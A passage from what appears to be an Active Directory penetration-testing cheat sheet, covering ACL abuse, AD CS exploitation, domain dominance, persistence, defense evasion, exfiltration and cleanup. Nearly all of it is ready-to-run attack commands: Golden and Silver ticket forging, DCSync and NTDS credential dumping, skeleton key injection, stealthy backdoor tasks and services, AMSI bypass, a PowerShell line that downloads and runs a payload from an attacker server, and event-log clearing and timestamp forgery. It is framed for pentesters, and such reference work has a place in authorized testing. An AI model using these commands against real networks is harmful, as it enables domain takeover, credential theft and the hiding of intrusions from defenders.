Set-DomainUserPassword -Identity <DA_User> -Password <NewPassword>. Native:net user <DA_User> <NewPassword> /domain.Add to DA group: PowerView
Add-DomainGroupMember -Identity "Domain Admins" -Members <YourUser>.Tools: PowerView (
Get-ObjectAcl,Find-InterestingDomainAcl), BloodHound,dsacls.exe,Set-Acl,aclpwn.py,Invoke-ACLPwn.Dacledit.py (Impacket fork):
python3 examples/dacledit.py -principal <attacker> -target <victim_object> -action read -dc-ip <DC_IP> <domain/user:pass>To add rights:
-action write -rights WriteMembers -ace-type allowed
AdminSDHolder: Modify ACL on
CN=AdminSDHolder,CN=System,<DomainDN>.
Shadow Credentials (msDS-KeyCredentialLink):
Condition: WriteProperty on
msDS-KeyCredentialLinkfor target user/computer.Tools:
Whisker.exe add /target:TargetUser$,Certipy shadow auto ...,PyWhisker.Auth with new cred:
Rubeus.exe asktgt /user:TargetUser$ /certificate:<PFX_or_Base64> /password:<PFXPass_if_any> /pttPKINITtools:
gettgtpkinit.py -pfx-base64 <base64_cert> <domain/target_user$> <output.ccache> getnthash.py -key <AS_REP_key_from_gettgtpkinit> <domain/target_user$>(needs
KRB5CCNAMEset to ccache).
AD CS Exploitation (ESC1-ESC11, Certifried):
Tools:
Certify.exe find /vulnerable,Certipy find -vulnerable ...,ForgeCert.exe(Rubeus component).ESC1 Conditions: Template allows "Enrollee Supplies Subject" (SAN), low-priv enrollment rights, EKU allows authentication (Client Auth, Smart Card Logon, Any Purpose).
ESC1 Exploit:
Certify.exe request /ca:<CA_Name> /template:<VulnerableTemplateName> /altname:<DA_UPN>certipy req -ca <CA_Name> -template <VulnerableTemplateName> -upn <DA_UPN> ...ESC8 (NTLM Relay to AD CS HTTP):
sudo ntlmrelayx.py ... -t http://<ADCS_Server>/certsrv/certfnsh.asp --adcs --template <TemplateName>Auth with cert:
Rubeus.exe asktgt /user:<DA_UPN_or_ImpersonatedUser> /certificate:<PathToPfxFile_or_Base64Cert> /password:<PfxPassword_if_any> /ptt
MSSQL PrivEsc: If SQL service account is DA, or SQL on DC.
xp_cmdshell, impersonate, trustworthy DBs.SCCM Site Takeover: NTLM Relay to MSSQL Site DB or SMS Provider.
Abusing Trust Relationships / Trust Attacks:
Intra-Forest (Child to Parent): Unconstrained Delegation (Printer Bug), GPO on Site, GoldenGMSA, DNS Trust attack, Foreign Group/ACL abuse.
Cross-Forest: Trust Account Attack, Unconstrained Delegation, SID History Injection, SID Filter Bypass (CVE-2020-0665), Abusing SQL Server Links, Abusing PAM Trusts/Shadow Principals.
SID History Abuse (Forge Golden Ticket with EA SID from parent/root in sIDHistory).
GPO Abuse: If write access to GPO linked to DCs/sensitive OUs. Deploy malicious task/script.
PyGPOAbuse:
pyGPOAbuse.py -u <user> -p <pass> -d <domain> --gpo-name "<GPO_Name>" --task-name "EvilTask" --command "payload.exe"
Specific Vulnerabilities:
ZeroLogon (CVE-2020-1472): Reset DC machine account pass. Tools: SharpZeroLogon, Invoke-ZeroLogon, ZeroDump. Mitigation: Apply security updates from August 2020 and later; enable secure RPC enforcement.
PrintNightmare (CVE-2021-1675/34527): RCE as SYSTEM via Print Spooler.
NoPAC (CVE-2021-42278/42287): Standard user to DA. noPAC C# tool,
sam-the-admin.py.sAMAccountName Spoofing (related to NoPAC): Change computer account sAMAccountName to DC's name, request TGT.
ShadowCoerce (MS-FSRVP): Coerce auth via File Server Remote VSS Protocol.
DFSCoerce (MS-DFSNM): Coerce auth via Distributed File System Namespace Management Protocol.
Certifried (CVE-2022-26923): Certificate-based machine account impersonation.
Phase 6: Domain Dominance - Owning the Kingdom 👑
Your Goal Here: Achieve full, persistent control over the Active Directory domain. This usually means compromising Domain Admin credentials, Enterprise Admin credentials (for forest-level control), or gaining direct control of Domain Controllers and the krbtgt account.
Pro Tip: The "Golden Ticket" is the ultimate prize for domain persistence and control. DCSync provides all domain hashes.
Your Toolkit & Commands:
Golden Ticket Attack (Requires
krbtgtaccount's NTLM hash or AES keys):Goal: Forge a TGT for any user (real or fake) with any privileges. Signed with
krbtgtcredentials.Obtain
krbtgthash/keys: Dump NTDS.dit (Phase 3).secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL | grep krbtgtMimikatz (on DC):
lsadump::dcsync /user:krbtgt /domain:<DomainFQDN>Forge with Mimikatz:
kerberos::golden /user:<FakeOrRealUserToImpersonate> /domain:<DomainFQDN> /sid:<DomainSID_of_TargetDomain> /krbtgt:<krbtgt_NTLM_Hash_or_AESKey> [/aes128|/aes256|/rc4] /id:<RID_of_User_e.g_500_for_Admin> /groups:<RIDs_of_Groups_e.g_512_for_DA,519_for_EA> /startoffset:0 /endin:600 /renewmax:10080 /ptt/user: Username to impersonate./domain: Fully Qualified Domain Name./sid: SID of the domain (not the krbtgt SID)./krbtgt: NTLM hash or AES key of the krbtgt account./id: Relative ID (RID) of the user to impersonate (e.g., 500 for built-in Administrator)./groups: Comma-separated RIDs of groups to include (e.g., 512 for Domain Admins, 519 for Enterprise Admins, 518 for Schema Admins)./ptt: Pass-the-Ticket (injects the forged ticket into current session).
Forge with Impacket ticketer.py:
ticketer.py -nthash <krbtgt_NTLM_Hash> -domain-sid <DomainSID> -domain <DomainFQDN> -user-id 500 -groups 512 <FakeUser>(Outputs
.ccache). Usage:export KRB5CCNAME=<ticket.ccache>, then Impacket tools with-k -no-pass.Forge with Rubeus:
NTLM Hash:
Rubeus.exe golden /user:<FakeUser> /domain:<DomainFQDN> /sid:<DomainSID> /rc4:<krbtgt_NTLM_Hash> /userid:500 /groups:512 /pttAES256 Key:
Rubeus.exe golden /user:<FakeUser> /domain:<DomainFQDN> /sid:<DomainSID> /aes256:<krbtgt_AES256_Key> /userid:500 /groups:512 /ptt
Impact: Full domain compromise. Valid until
krbtgtpassword changed twice.
Silver Ticket Attack (Requires Service Account NTLM Hash or AES keys):
Goal: Forge a TGS for a specific service on a specific server. No DC communication after forging.
Obtain Service Account Hash/Keys: Kerberoasting (Phase 3) or LSASS dump on service host.
Forge with Mimikatz:
kerberos::golden /user:<UserToImpersonate> /domain:<DomainFQDN> /sid:<DomainSID> /target:<TargetServerFQDN> /service:<ServiceName_e.g_cifs,host,http> /rc4:<ServiceAccount_NTLM_Hash_or_AESKey> [/aes128|/aes256] /id:<RID_of_User> /pttForge with Impacket ticketer.py:
ticketer.py -nthash <ServiceAccount_NTLM_Hash> -domain-sid <DomainSID> -domain <DomainFQDN> -spn <SPN_of_Service_e.g_cifs/fileserver.corp.local> <UserToImpersonate>Forge with Rubeus:
Rubeus.exe silver /user:<UserToImpersonate> /domain:<DomainFQDN> /sid:<DomainSID> /target:<TargetServerFQDN> /service:<ServiceName> /rc4:<ServiceAccount_NTLM_Hash> /userid:<RID_of_User> /pttImpact: Access specific service on target server as impersonated user.
DCSync Attack (Requires DA or specific replication rights):
Goal: Impersonate a DC, request password data via DRS Remote Protocol.
Required Privs:
DS-Replication-Get-Changes&DS-Replication-Get-Changes-Allon the domain object.Mimikatz:
Target specific user:
lsadump::dcsync /user:<Domain>\<UserToTarget_e.g_krbtgt_or_DA_User> /domain:<DomainFQDN> [/dc:<Target_DC>]Dump all:
lsadump::dcsync /all /csv
Impacket secretsdump.py:
Target specific user:
secretsdump.py <DOMAIN>/<DA_User>:<Password_or_Hash>@<Target_DC_IP_or_FQDN> -just-dc-user <UserToTarget_e.g_krbtgt>Dump all:
secretsdump.py <DOMAIN>/<DA_User>:<Password_or_Hash>@<Target_DC_IP_or_FQDN> -just-dc(or
-just-dc-ntlmfor only NTLM hashes)
AdminSDHolder Abuse: (See Phase 5 & 7) Modify ACLs on
CN=AdminSDHolder,CN=System,<DomainDN>.Skeleton Key Attack (Injects master password into LSASS on DCs):
Goal: Allows domain auth with a universal password. Original passwords still work.
Mimikatz (SYSTEM on ALL DCs):
privilege::debug misc::skeletonIf LSA PPL:
!+,!processprotect ...,misc::skeleton,!-.Impact: Domain-wide access. Lasts until DC reboots/LSASS restarts. Highly intrusive and detectable.
Modifying Domain Controller Group Policies: If rights to edit "Default Domain Controllers Policy" or GPOs linked to DCs OU.
Forest Trust Abuse: If EA compromised in forest root, often implicit admin in child domains.
Get-NetForestTrust.DCShadow Attack (Advanced - DA or specific rights):
Goal: Temporarily register rogue DC to push malicious AD object changes (e.g., SIDHistory, SPNs).
Mimikatz:
lsadump::dcshadow /object:<DN_to_modify> /attribute:<attr_name> /value:<new_value> lsadump::dcshadow /pushDetection: Network monitoring for DRSUAPI
DRSUAPI_REPLICA_ADDfrom non-DCs. Event IDs 5136, 5141.
Phase 7: Persistence - Staying In 🚪🚶
Your Goal Here: Ensure continued access to the compromised environment.
Pro Tip: Blend in. Use legitimate mechanisms. Golden Tickets & AdminSDHolder are powerful. Avoid noisy techniques.
Your Toolkit & Commands/Techniques:
Golden Ticket / Silver Ticket: (See Phase 6).
Pro Tip (Golden Ticket): Create Golden Tickets for non-existent users or with specific SIDs to make them harder to track. Remember, changing the
krbtgtpassword twice invalidates all Kerberos tickets, including Golden Tickets.
DCSync Rights for Stealthy Account:
Grant
DS-Replication-Get-Changes&DS-Replication-Get-Changes-Allto a controlled account.PowerView:
Add-ObjectAcl -TargetADSprefix 'DC=corp,DC=local' -PrincipalSamAccountName <StealthyUser> -Rights DCSyncADModule: Use
New-Object System.DirectoryServices.ActiveDirectoryAccessRuleandSet-Acl.
AdminSDHolder Backdoor: Add controlled account/group to ACL of
CN=AdminSDHolder,CN=System,<DomainDN>with GenericAll rights.PowerView:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System,<DomainDN>' -PrincipalSamAccountName <YourStealthyUser> -Rights AllForce SDProp:
Invoke-SDPropagator.ps1orreg add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "RunAdminSDExer" ...(risky).
Scheduled Tasks (on critical servers/DCs):
Command:
schtasks /create /s <Target_IP> /u <SYSTEM_or_PrivilegedUser> /tn <StealthyTaskName> /tr "C:\path\to\payload.exe" /sc ONSTART /ru SYSTEM /f
Service Creation/Modification:
Command (create):
sc.exe \\<Target_IP> create <StealthyServiceName> binPath= "C:\path\to\payload.exe" start= auto obj= "LocalSystem" DisplayName= "Legit Looking Service"Command (start):
sc.exe \\<Target_IP> start <StealthyServiceName>
Startup Scripts (GPO, Local Registry/Folder):
GPO: Modify Default Domain/DC Policy.
Registry Run Keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run,HKCU\Software\Microsoft\Windows\CurrentVersion\Run.Startup Folders:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp,%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.SharpPersist:
SharpPersist.exe -t startupfolder ...,-t reg ...
DLL Hijacking (Persistent).
COM Hijacking (Registry).
WMI Event Subscription (Permanent):
Invoke-WMIImplant,SharpWMI.Modifying User Logon Scripts (scriptPath attribute):
Set-ADUser -Identity <User> -ScriptPath "malicious.bat"(script on accessible share like SYSVOL).
Web Shells (on IIS/web servers).
Hidden Users/Accounts: Create/modify accounts. Hide from GAL (
msExchHideFromAddressLists = TRUE).DSRM (Directory Services Restore Mode) Abuse on DCs:
Obtain DSRM hash (
lsadump::samon DC).Enable DSRM network logon:
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" -Name DsrmAdminLogonBehavior -Value 2PtH with DSRM hash.
Custom Security Support Provider (SSP): Mimikatz:
misc::memssp(logs creds). Manual: Dropmimilib.dll, add toHKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.Sliver C2 Implants:
generate beacon --persistent ...ACLs for Remote Management (WMI/PSRemote/Remote Registry): PowerView:
Set-RemoteWMI ...,Set-RemotePSRemoting ...Domain Controller Shadowing / Malicious Replication: (Highly Advanced & Risky) Introduce a rogue DC or manipulate replication.
Further Reading: "Sneaky Active Directory Persistence Tricks" (@PyroTek3), MITRE ATT&CK Persistence.
Phase 8: Defense Evasion - Staying Off the Radar 👻
Your Goal Here: Avoid detection by AV, EDR, SIEM, IDS/IPS, and blue teams.
Pro Tip: "Living off the land" (LOLBAS). C2 frameworks offer evasion. Understand detection mechanisms.
Your Toolkit & Techniques:
Antivirus/EDR Evasion:
Custom Payloads/Shellcode: Packers, crypters, shellcode encoders (
msfvenom -e shikata_ga_nai -i <count>), encryption.In-Memory Execution: PowerShell
IEX (New-Object Net.WebClient).DownloadString('http://<Your_Server>/payload.ps1')Reflective DLL Injection, Process Hollowing. Sliver:
execute-assembly --amsi-bypass --etw-bypass ...AMSI Bypass (Anti-Malware Scan Interface): Patch
AmsiScanBuffer/AmsiScanStringin memory. Resources: GitHubAmsi-Bypass-Powershell(e.g., by S3cur3Th1sSh1t),Invisi-Shell.ETW Bypass/Patching: Sliver:
--etw-bypass.Disabling/Tampering with AV/EDR (Risky, SYSTEM needed, highly detectable).
Using Signed Binaries / LOLBAS (Living Off The Land Binaries and Scripts):
Concept: Execute malicious code or achieve objectives using legitimate, signed Windows binaries.
Examples:
msbuild.exe,regsvr32.exe,rundll32.exe,wmic.exe,certutil.exe.Project:
lolbas-project.github.io.
Fileless Malware: Payloads reside only in memory or in non-traditional storage like the registry, WMI, ADS.
Hiding Network Traffic (C2):
Encryption: HTTPS/TLS, DNS over HTTPS (DoH)/DNS over TLS (DoT).
Port Hopping/Common Ports: Use 80, 443, 53.
Domain Fronting (Effectiveness varies).
Randomized beaconing, jitter, sleep masks. C2 Profiles (Cobalt Strike Malleable C2, Sliver profiles).
Log Evasion/Tampering:
Clearing Event Logs (Admin, VERY NOISY):
wevtutil cl <LogName_e.g_Security,System,Application>Clear-EventLog -LogName SecurityDisabling Logging (PowerShell Script Block/Module Logging): Modify GPO or registry (e.g.,
HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, setEnableScriptBlockLoggingto0).Invoke-Phantom: Windows Event Log Killer.
Obfuscation:
Code (PowerShell, VBS, .NET), Command (PowerShell).
Tools:
Invoke-Obfuscation.
Alternate Data Streams (ADS - NTFS):
type payload.exe > legitfile.txt:hidden.exe certutil.exe -urlcache -split -f http://<Your_Server>/payload.exe file.exe:hidden.exeTime Stomping (Modifying File MACB Timestamps):
PowerShell:
Set-ItemProperty -Path <FilePath> -Name CreationTime -Value <DateTimeObject> Set-ItemProperty -Path <FilePath> -Name LastWriteTime -Value <DateTimeObject> Set-ItemProperty -Path <FilePath> -Name LastAccessTime -Value <DateTimeObject>timestomp.exe.
Using Non-Standard Tools / Custom C2.
Masquerading / Process Doppelgänging / Herpaderping: Rename tools to look legitimate (e.g.,
mimikatz.exetosvchost.exe).UAC Bypass: DiskCleanup Scheduled Task Hijack (
HKCU:\Environment\windir), FodHelper Execution Hijack (HKCU\Software\Classes\ms-settings\Shell\Open\command).AppLocker Bypass: Default rules (writable
%WINDIR%subdirs likeC:\Windows\Tasks), LOLBAS (InstallUtil,RunDll32).PowerShell Constrained Language Mode Bypass:
powershell.exe -Version 2, .NET assemblies/Runspaces.Sharp-Suite: Process Argument Spoofing.
Sysmon Evasion:
sysmon-config-bypass-finder.HoneyTokens Evasion: Forging Trusts, Honeypot Buster.
Further Reading: MITRE ATT&CK Defense Evasion.
Phase 9: Exfiltration - Stealing the Goods 💰 (Optional)
Your Goal Here: Extract sensitive data from the compromised network.
Pro Tip: Mind data size and network monitoring (DLP). Compress, encrypt, use covert channels or blend with legitimate traffic. Exfiltrate in chunks.
Your Toolkit & Techniques:
Common Protocols for Exfil:
HTTP/HTTPS: POST requests. Tools:
curl,wget, PowerShellInvoke-WebRequest/Invoke-RestMethod.DNS: Encode data in DNS queries (Base64 chunks as subdomains). Tools:
dnscat2,iodine,DET. Slow but stealthy.ICMP: Encode data in ICMP echo packets. Tools:
icmpsh,ptunnel-ng,PingTunnel. Slow, often blocked.FTP/SFTP/SCP: If available and outbound allowed.
Email: Attachments (risky, size limits, AV).
Covert Channels: Using non-standard protocols or abusing legitimate protocol fields.
Data Staging: Collect/compress data on an internal compromised machine before exfil. Compression:
tar,zip,7zip. PowerShell:Compress-Archive.Encryption: Encrypt data before exfil (AES, PGP/GPG). PowerShell:
Protect-CmsMessage. OpenSSL:openssl enc -aes-256-cbc ...Throttling / Low and Slow: Exfiltrate data slowly to avoid traffic alerts.
Tools for Exfiltration:
PowerShell:
Invoke-WebRequest,Start-BitsTransfer(BITS).Python:
requests(HTTP/S),socket.Rclone: Manage files on cloud storage.
C2 Frameworks: Built-in exfil modules (Sliver:
download,upload,loot).
Living Off The Land for Exfil:
certutil.exe -encodehex ...,bitsadmin.exe.
Phase 10: Post-Exploitation & Cleanup - Covering Tracks 🧹
Your Goal Here: Remove tools, logs, and traces to hinder investigation. (Often minimal in pentests where reporting is key, but crucial for real attackers).
Pro Tip: Cleanup can be noisy. Follow Rules of Engagement. Detailed reporting often preferred.
Your Toolkit & Techniques:
Removing Tools & Payloads:
del /F /Q <FilePath>Remove-Item -Path <File> -ForceSecure Delete:
sdelete.exe -p <passes> -z <File>. Remove ADS.
Clearing Command History:
PowerShell:
Clear-History,Remove-Item (Get-PSReadlineOption).HistorySavePath.Bash:
history -c, delete~/.bash_history.
Reverting System Changes: Undo persistence/privesc mods (registry, services, tasks, firewall rules) if scoped and safe. Caution: Complex, risky.
Removing User Accounts/Modifications:
Remove-ADUser,net user <user> /delete. Revert ACL changes.Log Manipulation (VERY NOISY & RISKY - Avoid in Pentests unless explicitly scoped):
wevtutil cl SecurityRestoring Original Files (if DLLs/binaries replaced): Requires backups.
C2 Framework Cleanup: Terminate beacons/implants. Remove C2 persistence. Clear C2 server logs if scoped.
Network Device Cleanup: Revert router/firewall rules. Clear logs if accessed.
Mission Debrief: Your Next Move 🚀
Alright operator, you've got the intel. This cheat sheet is your tactical field guide for dissecting Active Directory environments, from that first network ping to the echo of domain admin privileges. Consider it your go-to when you're in the digital trenches, a quick reference to the tools and TTPs that can make or break an engagement.
The Active Directory landscape isn't static – it's a dynamic battlefield. New exploits surface, defensive technologies evolve, and attackers refine their craft. Your learning curve is therefore perpetual. Keep that curiosity ignited, sharpen your skills with relentless practice, and always operate with unwavering integrity and within the legal boundaries of your engagements.
Thank Your For Reading Wish It Helps You Buddy
Important Visuals
Last updated